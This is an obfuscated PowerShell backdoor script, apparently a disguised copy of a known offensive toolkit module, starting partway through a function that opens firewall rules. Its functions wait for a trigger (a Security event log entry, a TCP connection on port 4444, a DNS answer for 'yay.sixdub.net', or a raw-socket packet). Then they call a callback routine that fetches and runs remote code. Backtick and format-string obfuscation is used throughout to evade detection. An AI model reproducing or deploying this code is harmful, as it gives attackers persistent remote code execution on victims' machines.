${R`Ule}."g`Ro`upinG"="@firewallapi.dll,-23255"
${ru`LE}."pro`FiL`ES" = 7
${R`uLe}."A`cTiON"=1
${r`uLe}."EDGetRA`V`E`RSAl"=${f`AlSE}
${fw}."r`ulES"."a`Dd"(${ru`lE})
${r`ULe} = New-Object -ComObject ("{3}{0}{2}{1}"-f '.FWR','le','u','HNetCfg')
${rU`Le}."Na`Me" = ${RulE`NAME}
${Ru`Le}."APPLICa`Tio`NN`A`me"=${E`x`EpAth}
${rU`LE}."p`RoTOcoL" = 17
${r`ule}."LoCAL`po`RTS" = ${P`orTs}
${rU`le}."DiRe`cTI`ON" = 2
${RU`le}."en`AblEd"=${tR`uE}
${R`uLE}."GroupI`Ng"="@firewallapi.dll,-23255"
${R`uLe}."p`ROfi`LEs" = 7
${R`ULe}."aCt`i`oN"=1
${Ru`Le}."EDgeTrAVE`R`saL"=${f`A`lse}
${Fw}."Rul`es"."a`dd"(${r`uLE})
${ru`LE} = New-Object -ComObject ("{1}{0}{2}{3}"-f'fg.F','HNetC','WRu','le')
${rU`Le}."NA`mE" = ${Ru`le`NAme}
${R`ULe}."a`ppLICationNa`ME"=${E`XepAth}
${Ru`LE}."P`R`otOcOl" = 6
${R`UlE}."L`O`caLporTS" = ${Por`Ts}
${R`ulE}."d`I`REcTiOn" = 1
${ru`lE}."ENA`BL`ED"=${tr`UE}
${r`UlE}."gro`uPI`Ng"="@firewallapi.dll,-23255"
${r`uLE}."Pr`O`FILEs" = 7
${r`Ule}."A`C`TiON"=1
${ru`lE}."EDgE`TRAV`ERSaL"=${fA`lsE}
${F`w}."RU`les"."A`dd"(${RU`lE})
${r`UlE} = New-Object -ComObject ("{0}{1}{2}{3}" -f 'H','NetCfg','.FW','Rule')
${r`uLE}."n`AMe" = ${ruleNa`me}
${Ru`le}."APp`LicaT`I`oN`NamE"=${ExePa`TH}
${rU`Le}."P`Rot`OCol" = 17
${RU`Le}."Loc`Alp`ORTs" = ${poR`Ts}
${r`ulE}."DIRectI`on" = 1
${r`ulE}."en`A`BLeD"=${t`Rue}
${RU`Le}."Gr`oUP`iNG"="@firewallapi.dll,-23255"
${r`UlE}."PrO`F`ileS" = 7
${r`uLE}."A`CTI`ON"=1
${R`ule}."Ed`gET`RaV`eRsaL"=${F`ALSe}
${F`W}."r`uLEs"."A`Dd"(${R`ule})
}
function InVOk`e`-EVeNTLoop
{
Param(
[Parameter(mANdAtOry=${T`RUE},POsiTion=1)]
[string]${cAlLBa`Ck`Ip},
[Parameter(MaNdAtoRY=${fA`lSE},PosITion=2)]
[string]${tRI`GG`ER}="SIXDUB",
[Parameter(MAnDaTORy=${F`AL`SE},PoSITIOn=3)]
[int]${tiM`EoUt}=0,
[Parameter(maNDatOry=${fA`LSE},PosiTiON=4)]
[int] ${s`lEEP}=1
)
If (-NOT ([Security.Principal.WindowsPrincipal] ( vARIABLe ('z'+'NU') -vALUEONl)::"gEtc`ur`ReNT"())."IsiN`RoLE"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This backdoor requires Admin :(... get to work! "
Return
}
write-host "Timeout: $Timeout"
write-host "Trigger: $Trigger"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${rUN`Ni`NG}=${t`RUE}
${mAT`ch} =""
${s`TArt`TImE} = get-date
while(${runn`i`Ng})
{
if (${timE`ouT} -ne 0 -and ($( ( vaRIAble ('I6S5n'+'r') ).VALuE::"N`OW") -gt ${st`A`RTtI`mE}."aDDs`ECO`NDs"(${ti`MEO`ut})))
{
${rUn`N`inG}=${FA`lSE}
}
${D} = Get-Date
${n`eW`EVEnTs} = Get-WinEvent -FilterHashtable @{"l`og`NAMe"='Security'; "ST`ArTT`IME"=${D}."aDDSecO`N`DS"(-${Sl`eEp})} -ErrorAction ("{2}{1}{0}"-f'ntinue','Co','Silently') | fl ("{1}{2}{0}" -f'e','M','essag') | Out-String
if (${nEw`even`TS} -match ${Tri`Gg`eR})
{
${runN`i`NG}=${FA`lSE}
${MAt`Ch} = ${C`Al`lbA`ckIP}
write-host "Match: $match"
}
sleep -s ${Sl`E`EP}
}
if(${m`Atch})
{
${suc`c`ESS} = Invoke-CallbackIEX ${MA`T`Ch}
}
}
function iNvo`KE`-pORTB`i`ND
{
Param(
[Parameter(MANdatory=${f`AlsE},PoSiTion=1)]
[string]${Cal`L`BAckiP},
[Parameter(maNDaTOrY=${fA`lse},pOSItIon=2)]
[string]${L`ocalIP},
[Parameter(mANDatorY=${f`ALSe},POsitION=3)]
[int]${P`OrT}=4444,
[Parameter(maNdAToRy=${F`AlsE},pOSiTIoN=4)]
[string]${t`R`iGgEr}="QAZWSX123",
[Parameter(MAnDAtoRY=${FA`LSE},POSiTion=5)]
[int]${TIM`E`ouT}=0
)
if (-not ${LOc`A`lIP})
{
route ("{1}{0}"-f'int','pr') ('0*') | % {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${N`ulL},${NU`ll},${N`ulL},${L`oCALIP},${n`uLl} = (VARiABle ('Q8w'+'Gpc') -VaLUeoNL )::"REp`LA`cE"(${_}."trI`MSTa`RT"(" "),"\s{2,}",",")."sPl`it"(",")
}
}
}
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
write-host "Timeout: $Timeout"
write-host "Port: $Port"
write-host "Trigger: $Trigger"
write-host "Using IPv4 Address: $LocalIP"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
try{
${iPeNd`POi`Nt} = new-object ("{2}{1}{0}{5}{4}{3}" -f't.ip','m.ne','syste','t','in','endpo')([net.ipaddress]"$localIP",${P`Ort})
${li`sTE`NEr} = new-object ("{0}{2}{7}{4}{6}{8}{1}{5}{3}" -f 'Sys','n','tem.','r','ock','e','ets.TcpLi','Net.S','ste') ${i`p`En`DPoinT}
${L`Isten`er}."St`Art"()
${RU`N`NinG}=${tr`Ue}
${M`AtCH} =""
${sta`R`TTi`ME} = get-date
while(${RU`Nn`inG})
{
if (${T`IMEO`ut} -ne 0 -and ($( ( Gi ("{2}{0}{3}{1}"-f 'RiaBlE','5NR','VA',':I6S') ).VALue::"N`ow") -gt ${St`AR`TTIME}."Ad`d`sECoNds"(${Ti`M`eOuT})))
{
${Ru`NN`inG}=${Fa`L`se}
}
if(${l`ISTE`NER}."Pe`Nd`Ing"())
{
${cL`I`EnT} = ${liSt`EN`Er}."accE`PTtcp`cl`IE`Nt"()
write-host "Client Connected!"
${S`TR`eam} = ${cl`IENT}."Ge`Tst`REAm"()
${REAd`ER} = new-object ("{3}{0}{4}{2}{1}" -f 'IO.','eader','reamR','System.','St') ${st`REAm}
${Li`NE} = ${RE`AD`Er}."reA`D`Line"()
if (${LI`Ne} -eq ${tRIG`G`Er})
{
${ru`Nni`Ng}=${FA`lSE}
${M`AT`CH} = ([system.net.ipendpoint] ${C`LI`enT}."cL`ieNt"."rEmotE`enDP`O`i`Nt")."aDD`R`ESS"."tOsTr`ING"()
write-host "MATCH: $match"
}
${reaD`eR}."dI`SpoSe"()
${ST`R`eAM}."dISPO`SE"()
${cli`E`NT}."c`LosE"()
write-host "Client Disconnected"
}
}
write-host "Stopping Socket"
${l`ISTenEr}."s`TOp"()
if(${mA`TCh})
{
if(${CA`lLb`A`Ckip})
{
${Suc`CesS} = Invoke-CallbackIEX ${c`AlLbA`cKIp}
}
else
{
${SuC`cE`Ss} = Invoke-CallbackIEX ${MAt`Ch}
}
}
}
catch [System.Net.Sockets.SocketException] {
write-host "Error: Socket Error" -fore ("{0}{1}"-f're','d')
}
}
function InVo`kE`-`DNsL`OOp
{
param(
[Parameter(mAndATOry=${FA`lse},pOsiTIOn=1)]
[string]${C`AllBack`IP},
[Parameter(MandATOrY=${fa`l`se},POsitioN=2)]
[string]${HO`S`TnaMe}="yay.sixdub.net",
[Parameter(MaNDaTOry=${fA`lSe},POsitiOn=3)]
[string]${TrIg`G`ER}="127.0.0.1",
[Parameter(MaNDaToRY=${F`Al`se},PoSItIOn=4)]
[int] ${TIme`O`Ut}=0,
[Parameter(mAnDAtory=${Fa`l`SE},PoSItioN=5)]
[int] ${sLe`Ep}=1
)
write-host "Timeout: $Timeout"
write-host "Sleep Time: $Sleep"
write-host "Trigger: $Trigger"
write-host "Using Hostname: $Hostname"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${r`UN`NinG}=${tr`ue}
${mat`cH} =""
${Sta`RTt`ime} = get-date
while(${RUn`NIng})
{
if (${Tim`EouT} -ne 0 -and ($( ( gET-vARIAble ("I6s5"+"Nr") ).value::"N`Ow") -gt ${Sta`R`TtiME}."aDDSec`O`Nds"(${TIM`eO`Ut})))
{
${R`uN`NInG}=${Fa`L`sE}
}
try {
${I`pS} = ( Get-VArIABle ("{1}{0}"-f 'RIxE','t') -vA)::"gEtH`OsTaD`DrEsS`Es"(${HO`stN`A`ME})
foreach (${ad`Dr} in ${I`Ps})
{
${r`Es`OL`Ved}=${a`DDR}."IpADdrESsT`Os`T`RING"
if(${reS`OL`VEd} -ne ${tR`I`Gger})
{
${RuN`NIng}=${F`AL`Se}
${mA`TcH}=${re`SOLv`Ed}
write-host "Match: $match"
}
}
}
catch [System.Net.Sockets.SocketException]{
}
sleep -s ${s`L`eEp}
}
write-host "Shutting down DNS Check..."
if(${ma`Tch})
{
if(${CAlLbAc`K`IP})
{
${su`cce`ss} = Invoke-CallbackIEX ${cA`lLBack`ip}
}
else
{
${su`ccE`sS} = Invoke-CallbackIEX ${m`ATch}
}
}
}
function inVok`e-P`ACKe`TkNOcK
{
param(
[Parameter(MANdaTorY=${faL`sE},pOsitIoN=1)]
[string]${CaLL`B`Ack`iP},
[Parameter(MANdatoRy=${f`Alse},POSiTion=2)]
[string]${lo`cAL`iP},
[Parameter(maNdatOrY=${f`AlSE},PoSiTIOn=3)]
[string]${tRIgG`eR}="QAZWSX123",
[Parameter(mAndaTORY=${fal`SE},pOsITIon=4)]
[int]${tI`Me`OUt}=0
)
If (-NOT ([Security.Principal.WindowsPrincipal] ( get-VARIABle ("Zn"+"u") -vaLueONLy)::"GE`TCuRr`e`NT"())."i`sIn`RoLe"([Security.Principal.WindowsBuiltInRole] "Administrator"))
{
Write-Host "This backdoor requires Admin :(... get to work! "
Return
}
if (-not ${lo`caLIP})
{
route ("{1}{0}" -f'int','pr') ('0*') | % {
if (${_} -match "\s{2,}0\.0\.0\.0") {
${nU`lL},${n`ULL},${nu`Ll},${L`oC`AliP},${n`ull} = ( lS ("vaRIaBlE"+":Q8WgP"+"C") ).vALue::"re`P`lACE"(${_}."T`Ri`mStArT"(" "),"\s{2,}",",")."SP`lIt"(",")
}
}
}
write-host "!!! THIS BACKDOOR REQUIRES FIREWALL EXCEPTION !!!"
write-host "Timeout: $Timeout"
write-host "Trigger: $Trigger"
write-host "Using IPv4 Address: $LocalIP"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${BY`TE`IN} = new-object ("{1}{0}" -f 'te[]','by') 4
${BY`TE`oUT} = new-object ("{2}{0}{1}" -f't','e[]','by') 4
${by`T`edata} = new-object ("{0}{1}" -f 'byte[',']') 4096
${BYTE`iN}[0] = 1
${b`YT`EIn}[1-3] = 0
${byT`eOut}[0-3] = 0
${s`OCket} = new-object ("{5}{3}{2}{6}{4}{0}{1}" -f 'kets','.socket','n','stem.','soc','sy','et.')( (DIR ("{2}{0}{3}{1}{4}"-f'lE:','fI','vaRIAb','L8','uY')).value::"iNte`R`Ne`TwoRk", (GCi ("{1}{0}{2}{3}"-f'aRIABLe:2','v','64p','VJ') ).ValUE::"r`AW", $EaCs::"Ip")
${s`ocK`Et}."sEtSOc`ketopti`On"("IP","HeaderIncluded",${t`RUe})
${So`CK`eT}."re`ceIve`BufFEr`sIzE" = 819200
${i`pE`N`dpoint} = new-object ("{6}{2}{0}{5}{4}{1}{3}"-f'em.n','i','t','nt','ipendpo','et.','sys')([net.ipaddress]"$localIP",0)
${S`OCkEt}."b`inD"(${i`pendP`oI`NT})
[void]${s`Oc`kEt}."IocoNtr`ol"( $jmhB::"r`EceIV`eA`ll",${bYT`eiN},${B`yT`eoUt})
${s`T`AR`TTiME} = get-date
${rUN`NiNG} = ${Tr`Ue}
${MAt`cH} = ""
${p`Ack`Ets} = @()
while (${r`UN`NiNg})
{
if (${T`I`MeOut} -ne 0 -and ($( (GET-chIldiTEM ("{3}{0}{4}{2}{1}"-f'arIABLe:','s5NR','6','V','i') ).vaLUe::"N`OW") -gt ${St`A`R`TtimE}."a`d`dsecONDS"(${tI`MeoUT})))
{
${RU`Nn`INg}=${f`ALSe}
}
if (-not ${S`oCkeT}."aV`AIlA`BLe")
{
start-sleep -milliseconds 500
continue
}
${R`cV} = ${s`Ock`ET}."rE`Ce`IVe"(${Byt`E`DATA},0,${BYTe`d`A`Ta}."lEN`GtH", $y4HBR::"NO`NE")
${meMOr`YS`Tr`eAm} = new-object ("{5}{6}{3}{1}{2}{0}{4}" -f 'mo','.M','e','O','ryStream','Syste','m.I')(${B`Y`TedatA},0,${r`cv})
${B`InArYRE`A`Der} = new-object ("{0}{4}{1}{3}{2}"-f 'Syst','.Bi','der','naryRea','em.IO')(${mEm`o`RYstREAM})
${T`RaSH} = ${B`iN`A`RYrea`DER}."rE`A`DbytEs"(12)
${SO`Ur`Ceip`A`dDRess} = ${BInA`RYREa`DEr}."reA`DUin`T32"()
${sOU`Rc`Eip`AddrEsS} = [System.Net.IPAddress]${SO`U`RceiP`ADD`REss}
${Des`TinAtiOnIP`A`DD`RESs} = ${B`InaRYr`e`ADeR}."reAd`u`INt32"()
${d`ESt`i`NA`TioNIPAd`Dre`SS} = [System.Net.IPAddress]${de`s`T`INAtIONIpaddR`E`ss}
${REmai`NDerb`Y`Tes} = ${bIn`ArY`R`EAder}."R`EA`DbYTeS"(${me`M`OrysT`Re`AM}."l`En`gTH")
${ASciie`N`CODIng} = new-object ("{3}{1}{4}{2}{0}" -f 'iiencoding','stem','xt.asc','sy','.te')
${reMaINd`E`ROfPAcK`et} = ${asc`Iienc`oDing}."g`ETS`TRINg"(${remai`Nder`B`Y`Tes})
${b`InarY`R`EaDEr}."c`loSe"()
${m`eM`OryStR`E`AM}."Cl`Ose"()
if (${R`EmA`IndER`OFPA`C`KEt} -match ${T`RiG`ger})
{
write-host "Match: " ${SourCE`iPa`D`d`ReSS}
${r`uNNi`Ng}=${FAl`SE}
${MAt`ch} = ${S`ourCEIpaD`d`Re`sS}
}
}
if(${MA`T`CH})
{
if(${cAL`lB`AcK`ip})
{
${S`uCC`EsS} = Invoke-CallbackIEX ${C`A`llbaCKIp}
}
else
{
${sU`Cce`ss} = Invoke-CallbackIEX ${Ma`Tch}
}
}
}
function i`N`Vok`E-CalLb`AC`KLOop
{
Param(
[Parameter(MaNdATorY=${tR`uE},PoSitIoN=1)]
[string]${c`All`Ba`ckIP},
[Parameter(maNDatoRY=${f`AL`se},poSItION=2)]
[int]${tiME`O`ut}=0,
[Parameter(ManDATORy=${Fa`LSE},poSiTion=3)]
[int] ${Sle`Ep}=1
)
write-host "Timeout: $Timeout"
write-host "Sleep: $Sleep"
write-host "CallbackIP: $CallbackIP"
write-host
write-host "Starting backdoor..."
${Runn`I`NG}=${t`RuE}
${ma`T`ch} =""
${s`TART`TiMe} = get-date
while(${r`u`NNing})
{
if (${Ti`MeOuT} -ne 0 -and ($( ( gET-VARIAblE ("i6S"+"5nR") -vAlue)::"n`ow") -gt ${St`ArTTi`mE}."addS`e`conds"(${TI`mE`ouT})))
{
${Ru`N`NiNg}=${F`Al`sE}
}
${Ch`E`cksucce`ss} = Invoke-CallbackIEX ${C`ALLB`AcKiP} -Silent ${Tr`uE}
if(${ch`e`ckS`UCc`ESs} -eq 1)
{
${R`unn`inG}=${fal`Se}
}
sleep -s ${s`l`EeP}
}
write-host "Shutting down backdoor..."
}